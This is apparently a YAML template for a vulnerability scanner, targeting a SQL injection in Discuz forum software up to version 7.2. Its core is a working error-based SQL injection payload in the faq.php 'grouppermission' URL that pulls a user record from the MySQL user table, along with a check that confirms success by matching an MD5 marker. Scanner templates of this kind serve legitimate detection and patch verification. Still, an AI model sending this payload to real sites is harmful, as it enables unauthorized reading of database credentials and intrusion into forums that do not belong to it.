product: Discuz
vName: Discuz 7.2 sql注入
type: SQL注入
vID: [ ]
level: 3
vDesc: ''
version: discuz <=v7.2
note: ''
search: { }
protocol: http
link: https://blog.csdn.net/weixin_40709439/article/details/82780606
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 81dc9bdb52d04dc20036dbd8313ed055
            logic: and